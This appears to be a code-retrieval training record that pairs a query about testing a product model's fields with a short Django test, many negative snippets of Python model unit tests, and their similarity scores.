prd._meta.get_field('name').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label name\n max_length = prd._meta.get_field('name').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label name\n prd_blank = prd._meta.get_field('name').blank\n self.assertTrue(prd_blank)\n # test null field in label name\n prd_null = prd._meta.get_field('name').null\n self.assertTrue(prd_null)\n\n # test the type of description field\n prd_type = prd._meta.get_field('description').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label description\n max_length = prd._meta.get_field('description').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label description\n prd_blank = prd._meta.get_field('description').blank\n self.assertTrue(prd_blank)\n # test null field in label description\n prd_null = prd._meta.get_field('description').null\n self.assertTrue(prd_null)\n\n # test the type of nutrition_grade field\n prd_type = prd._meta.get_field('nutrition_grade').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label nutrition_grade\n max_length = prd._meta.get_field('nutrition_grade').max_length\n self.assertEqual(max_length, 1)\n # test blank field in label nutrition_grade\n prd_blank = prd._meta.get_field('nutrition_grade').blank\n self.assertTrue(prd_blank)\n # test null field in label nutrition_grade\n prd_null = prd._meta.get_field('nutrition_grade').null\n self.assertTrue(prd_null)\n\n # test the type of barcode field\n prd_type = prd._meta.get_field('barcode').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label barcode\n max_length = prd._meta.get_field('barcode').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label barcode\n prd_blank = prd._meta.get_field('barcode').blank\n self.assertFalse(prd_blank)\n # test null field in label barcode\n prd_null = prd._meta.get_field('barcode').null\n self.assertFalse(prd_null)\n\n # test the type of url field\n prd_type = prd._meta.get_field('url').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url\n max_length = prd._meta.get_field('url').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url\n prd_blank = prd._meta.get_field('url').blank\n self.assertTrue(prd_blank)\n # test null field in label url\n prd_null = prd._meta.get_field('url').null\n self.assertTrue(prd_null)\n\n # test the type of url_pic field\n prd_type = prd._meta.get_field('url_pic').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url_pic\n max_length = prd._meta.get_field('url_pic').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url_pic\n prd_blank = prd._meta.get_field('url_pic').blank\n self.assertTrue(prd_blank)\n # test null field in label url_pic\n prd_null = prd._meta.get_field('url_pic').null\n self.assertTrue(prd_null)\n\n # test the type of store field\n prd_type = prd._meta.get_field('store').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label store\n max_length = prd._meta.get_field('store').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label store\n prd_blank = prd._meta.get_field('store').blank\n self.assertTrue(prd_blank)\n # test null field in label store\n prd_null = prd._meta.get_field('store').null\n self.assertTrue(prd_null)\n\n # test the type of fat field\n prd_type = prd._meta.get_field('fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label fat max digits\n max_digits = prd._meta.get_field('fat').max_digits\n self.assertEqual(max_digits, 5)\n # label fat decimal places\n dec_places = prd._meta.get_field('fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label fat\n prd_blank = prd._meta.get_field('fat').blank\n self.assertTrue(prd_blank)\n # test null field in label fat\n prd_null = prd._meta.get_field('fat').null\n self.assertTrue(prd_null)\n\n # test the type of saturated_fat field\n prd_type = prd._meta.get_field('saturated_fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label saturated_fat max digits\n max_digits = prd._meta.get_field('saturated_fat').max_digits\n self.assertEqual(max_digits, 5)\n # label saturated_fat decimal places\n dec_places = prd._meta.get_field('saturated_fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label saturated_fat\n prd_blank = prd._meta.get_field('saturated_fat').blank\n self.assertTrue(prd_blank)\n # test null field in label saturated_fat\n prd_null = prd._meta.get_field('saturated_fat').null\n self.assertTrue(prd_null)\n\n # test the type of sugar field\n prd_type = prd._meta.get_field('sugar').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label sugar max digits\n max_digits = prd._meta.get_field('sugar').max_digits\n self.assertEqual(max_digits, 5)\n # label sugar decimal places\n dec_places = prd._meta.get_field('sugar').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label sugar\n prd_blank = prd._meta.get_field('sugar').blank\n self.assertTrue(prd_blank)\n # test null field in label sugar\n prd_null = prd._meta.get_field('sugar').null\n self.assertTrue(prd_null)\n\n # test the type of salt\n prd_type = prd._meta.get_field('salt').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label salt max digits\n max_digits = prd._meta.get_field('salt').max_digits\n self.assertEqual(max_digits, 5)\n # label salt decimal places\n dec_places = prd._meta.get_field('salt').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label salt\n prd_blank = prd._meta.get_field('salt').blank\n self.assertTrue(prd_blank)\n # test null field in label salt\n prd_null = prd._meta.get_field('salt').null\n self.assertTrue(prd_null)\n\n # test the type of prd_cat\n prd_type = prd._meta.get_field('prd_cat').get_internal_type()\n self.assertEqual(prd_type, 'ForeignKey')\n # label db_column\n fk = prd._meta.get_field('prd_cat').db_column\n self.assertEqual(fk, 'prd_cat')\n # test blank field in label prd_cat\n prd_blank = prd._meta.get_field('prd_cat').blank\n self.assertFalse(prd_blank)\n # test null field in label prd_cat\n prd_null = prd._meta.get_field('prd_cat').null\n self.assertFalse(prd_null)\n\n # Favourite table ----------------------------------------------------", "def test_add_relation_types(self):\n pass", "def test_Product(self):\n self.assertEquals(self.prod_1.pk, 1)\n self.assertEquals(self.prod_1.ean, '3350033118072')\n self.assertEquals(self.prod_1.name, 'test 1')\n self.assertEquals(self.prod_1.nutriscore, 'u')\n self.assertEquals(self.prod_1.category, 'cat 1')", "def attribute(self, data, model, model_name):", "def test_create_category_with_invalid_details_fails(self):\n res = self.client.post(CATEGORY_URL, {})\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n res.data['errors']['name'][0],\n 'This field is required.')", "def test_attr(self):\n self.assertTrue(hasattr(self.amenity, \"created_at\"))\n self.assertTrue(hasattr(self.amenity, \"id\"))\n self.assertTrue(hasattr(self.amenity, \"updated_at\"))\n self.assertFalse(hasattr(self.amenity, \"random_attr\"))\n self.assertTrue(hasattr(self.amenity, \"name\"))\n self.assertEqual(self.amenity.__class__.__name__, \"Amenity\")\n self.assertEqual(self.amenity.name, \"\")", "def _testRatingCategories(self):\n\n\n try:\n user = auth.User.objects.all()[0]\n category = models.Category.objects.all()[0]\n host = models.Host(user=user, category=category,\n url='http://blah.com')\n host.save()\n\n comment = models.Comment(text='test', host=host)\n comment.save()\n\n types = models.RatingType.objects.all()\n\n items = []\n for value, type in zip([3, 4, 5], types):\n tmp_obj = models.Rating(comment=comment, type=type, value=value)\n tmp_obj.save()\n items.append(tmp_obj)\n\n assert comment.rating() - 4.0 < .0001, comment.rating()\n\n comment2 = models.Comment(text='test', host=host)\n comment2.save()\n\n for value, type in zip([3, 3, 3], types):\n tmp_obj = models.Rating(comment=comment2, type=type, value=value)\n tmp_obj.save()\n items.append(tmp_obj)\n\n assert comment2.rating() - 3.0 < .0001, comment2.rating()\n\n assert host.rating() == 3.5, host.rating()\n\n ratings = host.ratings()\n assert ratings['Support'] == 3.5, ratings\n assert ratings['Features'] == 3.0\n assert ratings['Uptime'] == 4.0\n\n finally:\n try:\n for tmp_obj in items:\n tmp_obj.delete()\n \n comment.delete()\n comment2.delete()\n host.delete()\n except:\n pass", "def test_model_can_create_a_film(self):\n self.assertEqual(self.film.title, \"test_a\")", "def test_blank_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n rv = self.category('')\n self.assertIn(b'Field must be between 1 and 50 characters long.', rv.data)", "def test_extract_categories():\n pass", "def test_create(self):\n lvl = AcademicLevel.objects.create(\n name=\"random_academic_level\",\n )\n\n self.assertEqual(lvl.__str__(), \"random_academic_level\")" ]
[ "0.7511274", "0.74611753", "0.7387198", "0.7346792", "0.7272893", "0.721909", "0.6904485", "0.69011027", "0.6842334", "0.67509025", "0.67248386", "0.6717649", "0.6624068", "0.656367", "0.6542668", "0.6540674", "0.65404874", "0.6470544", "0.646362", "0.64630693", "0.64449406", "0.64380944", "0.6420919", "0.63919896", "0.63862425", "0.63689536", "0.6335148", "0.63275295", "0.630453", "0.6263592", "0.6256702", "0.6240916", "0.62289137", "0.621453", "0.62130475", "0.6187344", "0.61701363", "0.6156475", "0.61532557", "0.6147836", "0.61463803", "0.6134411", "0.6126971", "0.6114183", "0.60760576", "0.6072388", "0.6069807", "0.60636544", "0.60524374", "0.604647", "0.60384077", "0.602763", "0.60171455", "0.6016896", "0.6015665", "0.6015262", "0.6014618", "0.6013886", "0.60111725", "0.5996032", "0.59893495", "0.5982667", "0.59728646", "0.59694654", "0.5968645", "0.5956622", "0.59555805", "0.5949529", "0.5928767", "0.59239477", "0.5923543", "0.5922495", "0.59057546", "0.5897322", "0.58957684", "0.5893867", "0.5891196", "0.5889996", "0.58883166", "0.588063", "0.5876221", "0.58680284", "0.5856271", "0.58482504", "0.58426625", "0.5825181", "0.5821702", "0.58140576", "0.5810927", "0.58058816", "0.57933843", "0.5784194", "0.5784034", "0.57836735", "0.5779272", "0.5776196", "0.57693905", "0.57685566", "0.57648873", "0.57622737" ]
0.80247825
0
Test Category model default name
def test_category_model_entry(self): data = self.data1 self.assertEqual(str(data), 'django')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __str__(self):\n return self.category_name", "def test_category_name_label(self):\n\n cat = Category.objects.get(id=1)\n label_name = cat._meta.get_field('name').verbose_name\n self.assertEqual(label_name, 'name')", "def make_test_category(self):\n\n c = Category(slug='test')\n\n return c", "def __str__(self):\n return self.cat_name", "def get_default_category():\n return Category.objects.get_or_create(name='Unknown')[0]", "def test_category_lowercase(self):\n self.assertEqual(self.category.category, \"test\")", "def get_name(self):\n return self.category_name", "def test_model_string_representation(self, init_db, category):\n assert repr(category) == f'<Category: {category.name}>'", "def category_name(self):\n return self.category.name", "def getCategory():", "def name(self) -> str:\n return str(self.category.value)", "def sample_category(name='place'):\n return Category.objects.create(name=name)", "def test_create_category(self):\n pass", "def __init__(self, category):\n self.category = category\n self.name = \"Filters.document.category('{}')\".format(self.category)", "def default_model():\n return \"teenytweetynet\"", "def model_name(self) -> str:\n return \"mock-model-name\"", "def __init__(self, display_name, model, category='OTHER', **kwargs):\n super().__init__(display_name, **kwargs)\n set_accessory_info(self, display_name, model)\n self.category = getattr(Category, category, Category.OTHER)", "def category_name(self):\n try:\n category = self.proto.category.parent\n return f'{category.name} - {self.proto.category.name}'\n except AttributeError:\n return self.proto.category.name", "def get_category_name(self):\n return self._ctx.get(\"name\", self._ctx[\"id\"])", "def category(self):\n return self._ctx.get(\"name\", self._ctx[\"id\"])", "def test_init_with_default_value_string(self):\n categories = {\"asdfa\": 0.1, 2: 0.2, 3: 0.3, \"lalala\": 0.4}\n dim = Categorical(\"yolo\", categories, default_value=\"asdfa\")\n\n assert type(dim.default_value) is str", "def __str__(self):\n \n return \"Category ID: %s %s\" % (self.category_id, self.name)", "def get_category(self) -> str:\n return self.category", "def __init__(self, cat_name):\n super(Cat, self).__init__(cat_name)", "def test_get_name(self):\n name = \"The Name\"\n event_category = EventCategory(name=name)\n self.assertEqual(name, str(event_category), msg=(\n 'Method ``__str__`` did not output event category name.'))", "def category(self) -> str:\n return pulumi.get(self, \"category\")", "def create_category():\n category = Category(name='testcategory', description=\"\", fee=DEFAULT_FEE)\n category.save()\n return category", "def get_model_title(self):\n pass", "def test_create_category_with_existing_name(self):\n sample_category()\n res = self.client.post(CATEGORY_URL, {\"name\": \"place\"})\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n res.data['errors']['name'][0],\n 'This field must be unique.')", "def test_auto_slug(self):\n category = Category.objects.create()\n translation = CategoryTranslation.objects.create(\n name=\"Charter Schools\", category=category)\n self.assertEqual(category.slug, \"charter-schools\")", "def category_title(self):\n categories = {c[0]:c[1] for c in self.CATEGORY_CHOICES}\n if self.category in categories:\n return categories[self.category]", "def category(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"category\")", "def test_0005_create_categories(self):\n self.create_category(name='Test 0060 Workflow Features', description='Test 0060 - Workflow Features')", "def get_model_name(ind: int) -> str:\n return f'{fizz_name}-{fizz_type.model_name}'", "def get_model_name():\n return 'Central Tendency'", "def test_model_name_value(self):\n \n model_name = get_model()[0]\n \n # Check to make sure the model_name is 'iMac'\n self.assertEqual(model_name, 'iMac')", "def __str__(self):\n return '%s%s' % (self.name, ' - %s' % self.model if self.model else '')", "def display_name(self):", "def default_name(self):\n return '[' + self.__class__.__name__ + ']'", "def __str__(self):\r\n return self.name", "def __str__(self):\r\n return self.name", "def __str__(self):\r\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name" ]
[ "0.69887996", "0.69840467", "0.6772042", "0.6648228", "0.6618688", "0.6510455", "0.6509711", "0.6475036", "0.64495313", "0.63525605", "0.6342909", "0.62700176", "0.6242026", "0.6151665", "0.61083674", "0.60542405", "0.6046889", "0.59698623", "0.5938677", "0.5932067", "0.5917186", "0.58800954", "0.582827", "0.58030266", "0.5792314", "0.5782522", "0.5781612", "0.57796735", "0.57671475", "0.5764285", "0.57642704", "0.57528406", "0.5752046", "0.5741812", "0.57331395", "0.5732029", "0.5723601", "0.5719983", "0.5718784", "0.56973827", "0.56973827", "0.56973827", "0.5690021", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063" ]
0.0
-1
Test product model data insertion/types/field attributes
def test_products_model_entry(self): data = self.data1 self.assertTrue(isinstance(data, Product)) self.assertEqual(str(data), 'django beginners')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_product_fields(self):\n\n prd = Product.objects.get(id=1)\n\n # test the type of name field\n prd_type = prd._meta.get_field('name').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label name\n max_length = prd._meta.get_field('name').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label name\n prd_blank = prd._meta.get_field('name').blank\n self.assertTrue(prd_blank)\n # test null field in label name\n prd_null = prd._meta.get_field('name').null\n self.assertTrue(prd_null)\n\n # test the type of description field\n prd_type = prd._meta.get_field('description').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label description\n max_length = prd._meta.get_field('description').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label description\n prd_blank = prd._meta.get_field('description').blank\n self.assertTrue(prd_blank)\n # test null field in label description\n prd_null = prd._meta.get_field('description').null\n self.assertTrue(prd_null)\n\n # test the type of nutrition_grade field\n prd_type = prd._meta.get_field('nutrition_grade').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label nutrition_grade\n max_length = prd._meta.get_field('nutrition_grade').max_length\n self.assertEqual(max_length, 1)\n # test blank field in label nutrition_grade\n prd_blank = prd._meta.get_field('nutrition_grade').blank\n self.assertTrue(prd_blank)\n # test null field in label nutrition_grade\n prd_null = prd._meta.get_field('nutrition_grade').null\n self.assertTrue(prd_null)\n\n # test the type of barcode field\n prd_type = prd._meta.get_field('barcode').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label barcode\n max_length = prd._meta.get_field('barcode').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label barcode\n prd_blank = prd._meta.get_field('barcode').blank\n self.assertFalse(prd_blank)\n # test null field in label barcode\n prd_null = prd._meta.get_field('barcode').null\n self.assertFalse(prd_null)\n\n # test the type of url field\n prd_type = prd._meta.get_field('url').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url\n max_length = prd._meta.get_field('url').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url\n prd_blank = prd._meta.get_field('url').blank\n self.assertTrue(prd_blank)\n # test null field in label url\n prd_null = prd._meta.get_field('url').null\n self.assertTrue(prd_null)\n\n # test the type of url_pic field\n prd_type = prd._meta.get_field('url_pic').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url_pic\n max_length = prd._meta.get_field('url_pic').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url_pic\n prd_blank = prd._meta.get_field('url_pic').blank\n self.assertTrue(prd_blank)\n # test null field in label url_pic\n prd_null = prd._meta.get_field('url_pic').null\n self.assertTrue(prd_null)\n\n # test the type of store field\n prd_type = prd._meta.get_field('store').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label store\n max_length = prd._meta.get_field('store').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label store\n prd_blank = prd._meta.get_field('store').blank\n self.assertTrue(prd_blank)\n # test null field in label store\n prd_null = prd._meta.get_field('store').null\n self.assertTrue(prd_null)\n\n # test the type of fat field\n prd_type = prd._meta.get_field('fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label fat max digits\n max_digits = prd._meta.get_field('fat').max_digits\n self.assertEqual(max_digits, 5)\n # label fat decimal places\n dec_places = prd._meta.get_field('fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label fat\n prd_blank = prd._meta.get_field('fat').blank\n self.assertTrue(prd_blank)\n # test null field in label fat\n prd_null = prd._meta.get_field('fat').null\n self.assertTrue(prd_null)\n\n # test the type of saturated_fat field\n prd_type = prd._meta.get_field('saturated_fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label saturated_fat max digits\n max_digits = prd._meta.get_field('saturated_fat').max_digits\n self.assertEqual(max_digits, 5)\n # label saturated_fat decimal places\n dec_places = prd._meta.get_field('saturated_fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label saturated_fat\n prd_blank = prd._meta.get_field('saturated_fat').blank\n self.assertTrue(prd_blank)\n # test null field in label saturated_fat\n prd_null = prd._meta.get_field('saturated_fat').null\n self.assertTrue(prd_null)\n\n # test the type of sugar field\n prd_type = prd._meta.get_field('sugar').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label sugar max digits\n max_digits = prd._meta.get_field('sugar').max_digits\n self.assertEqual(max_digits, 5)\n # label sugar decimal places\n dec_places = prd._meta.get_field('sugar').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label sugar\n prd_blank = prd._meta.get_field('sugar').blank\n self.assertTrue(prd_blank)\n # test null field in label sugar\n prd_null = prd._meta.get_field('sugar').null\n self.assertTrue(prd_null)\n\n # test the type of salt\n prd_type = prd._meta.get_field('salt').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label salt max digits\n max_digits = prd._meta.get_field('salt').max_digits\n self.assertEqual(max_digits, 5)\n # label salt decimal places\n dec_places = prd._meta.get_field('salt').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label salt\n prd_blank = prd._meta.get_field('salt').blank\n self.assertTrue(prd_blank)\n # test null field in label salt\n prd_null = prd._meta.get_field('salt').null\n self.assertTrue(prd_null)\n\n # test the type of prd_cat\n prd_type = prd._meta.get_field('prd_cat').get_internal_type()\n self.assertEqual(prd_type, 'ForeignKey')\n # label db_column\n fk = prd._meta.get_field('prd_cat').db_column\n self.assertEqual(fk, 'prd_cat')\n # test blank field in label prd_cat\n prd_blank = prd._meta.get_field('prd_cat').blank\n self.assertFalse(prd_blank)\n # test null field in label prd_cat\n prd_null = prd._meta.get_field('prd_cat').null\n self.assertFalse(prd_null)\n\n # Favourite table ----------------------------------------------------", "def test_product_create(self):\n self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])", "def test_Product(self):\n self.assertEquals(self.prod_1.pk, 1)\n self.assertEquals(self.prod_1.ean, '3350033118072')\n self.assertEquals(self.prod_1.name, 'test 1')\n self.assertEquals(self.prod_1.nutriscore, 'u')\n self.assertEquals(self.prod_1.category, 'cat 1')", "def test_product(self):\n self.assertEqual(self.test_product.name, self.test_product_name)\n self.assertEqual(self.test_product.price, self.test_product_price)", "def setUpTestData(cls):\n Product_type.objects.create(\n name='New_Product', display_name='New Product.')", "def test_object_creation(self):\n serializer = ProductSerializer(data=self.data)\n self.assertTrue(serializer.is_valid())\n product = serializer.save()\n\n self.assertEqual(product.title, self.title)\n self.assertEqual(product.description, self.description)\n self.assertEqual(product.price, self.price)\n self.assertTrue(product.is_active)\n self.assertTrue(product.available)", "def test_product_update(self):\n # first performe create\n id = self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])\n if id:\n # then performe update\n data = { \n \"name\": \"Changed the name\",\n \"description\": self.product_data[\"description\"],\n \"image_link\": self.product_data[\"image_link\"],\n \"price\": self.product_data[\"price\"]\n }\n self._update_model(\"product\", id, data, [\"name\"])\n self.assertIsNotNone(id)", "def test_products_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Recipe))\n self.assertEqual(str(data), 'django beginners')", "def test_prep_new_data(self):\n pass", "def test_new_product(self):\n prod = Product(name='New Product', price=100, weight=60,\n flammability=0.9)\n self.assertEqual(prod.explode(), '...BABOOM!!')\n self.assertEqual(prod.stealability(), 'Very stealable!')", "def test_custom_attribute_post(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_values\": [{\n \"attribute_value\": \"my custom attribute value\",\n \"custom_attribute_id\": cad.id,\n }],\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n ca_json = response.json[0][1][\"product\"][\"custom_attribute_values\"][0]\n self.assertIn(\"attributable_id\", ca_json)\n self.assertIn(\"attributable_type\", ca_json)\n self.assertIn(\"attribute_value\", ca_json)\n self.assertIn(\"id\", ca_json)\n self.assertEqual(ca_json[\"attribute_value\"],\n \"my custom attribute value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"my custom attribute value\"\n )", "def test_update_attribute_data(self):\n pass", "def test_custom_attribute_put_add(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n product_url = response.json[0][1][\"product\"][\"selfLink\"]\n headers = self.client.get(product_url).headers\n\n product_data[0][\"product\"][\"custom_attribute_values\"] = [{\n \"attribute_value\": \"added value\",\n \"custom_attribute_id\": cad.id,\n }]\n\n response = self._put(product_url, product_data[0], extra_headers={\n 'If-Unmodified-Since': headers[\"Last-Modified\"],\n 'If-Match': headers[\"Etag\"],\n })\n\n product = response.json[\"product\"]\n\n self.assertEqual(len(product[\"custom_attribute_values\"]), 1)\n ca_json = product[\"custom_attribute_values\"][0]\n self.assertIn(\"attributable_id\", ca_json)\n self.assertIn(\"attributable_type\", ca_json)\n self.assertIn(\"attribute_value\", ca_json)\n self.assertIn(\"id\", ca_json)\n self.assertEqual(ca_json[\"attribute_value\"],\n \"added value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"added value\"\n )\n\n headers = self.client.get(product_url).headers\n\n product_data[0][\"product\"][\"custom_attribute_values\"] = [{\n \"attribute_value\": \"edited value\",\n \"custom_attribute_id\": cad.id,\n }]\n\n response = self._put(product_url, product_data[0], extra_headers={\n 'If-Unmodified-Since': headers[\"Last-Modified\"],\n 'If-Match': headers[\"Etag\"],\n })\n\n product = response.json[\"product\"]\n ca_json = product[\"custom_attribute_values\"][0]\n self.assertIn(\"attributable_id\", ca_json)\n self.assertIn(\"attributable_type\", ca_json)\n self.assertIn(\"attribute_value\", ca_json)\n self.assertIn(\"id\", ca_json)\n self.assertEqual(ca_json[\"attribute_value\"],\n \"edited value\")", "def test_update_product_required_fields(self):\n data = {\n 'pk': 1,\n 'name': None,\n 'description': '''\n Yogurt also spelled yoghurt, yogourt or yoghourt,\n is a food produced by bacterial fermentation of milk.\n '''\n }\n url = reverse('products:detail', kwargs={'pk': data['pk']})\n response = self.client.put(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(models.Product.objects.filter(name=None).count(), 0)", "def test_prep_fields(self):\n pass", "def setUp(self):\n super().setUp()\n list_of_product_types = [\n 'default_product_variant',\n 'multiple_product_variants',\n 'ceo_title'\n ]\n self.new_product = eval(f\"get_new_product_with_\" \\\n f\"{list_of_product_types[randint(0, len(list_of_product_types) - 1)]}()\")\n response = ProcessRequest('products.json').send_request(\n 'POST',\n data=self.new_product,\n expected_return_codes=[201],\n )\n self.product_id = response.response['product']['id']", "def test_02_product_update(self):\n # Update new product state2 from default draft to sellable\n new_product = self.create_product()\n self.assertEqual(new_product.state2, 'draft')\n new_product.state2 = 'sellable'\n self.assertEqual(new_product.state2, 'sellable')\n\n # Same but to an existing demo product.\n demo_product = self.product_obj.browse(\n self.ref('product_lifecycle.product_product_4g'))\n self.assertEqual(demo_product.state2, 'sellable')\n demo_product.state2 = 'draft'\n self.assertEqual(demo_product.state2, 'draft')\n\n # Update new product invividual field (field defined in product.product\n # model).\n self.assertEqual(new_product.default_code, 'A2330')\n new_product.default_code = 'A2330-1'\n self.assertEqual(new_product.default_code, 'A2330-1')\n\n # Same but to an existing demo product.\n self.assertEqual(demo_product.default_code, 'A2329')\n demo_product.default_code = 'A2329-1'\n self.assertEqual(demo_product.default_code, 'A2329-1')\n\n # Update new product commom characteristic (field defined in\n # product.template) and check that affects the another product\n # variants\n self.assertFalse(new_product.description)\n new_product.description = 'This is a New Product'\n self.assertEqual(new_product.description, 'This is a New Product')\n self.assertEqual(demo_product.description, 'This is a New Product')\n demo_product.description = False\n self.assertFalse(demo_product.description)", "def test_product_detail(self):\n # first performing create\n id = self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])\n if id:\n # then performing detail\n self._detail_model(\"product\", self.product_data, id, [\"name\", \"description\", \"image_link\", \"price\"])\n \n self.assertIsNotNone(id)", "def test_custom_attribute_post_both(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n cad_json = builder.json.publish(cad.__class__.query.get(cad.id))\n cad_json = builder.json.publish_representation(cad_json)\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_definitions\":[\n 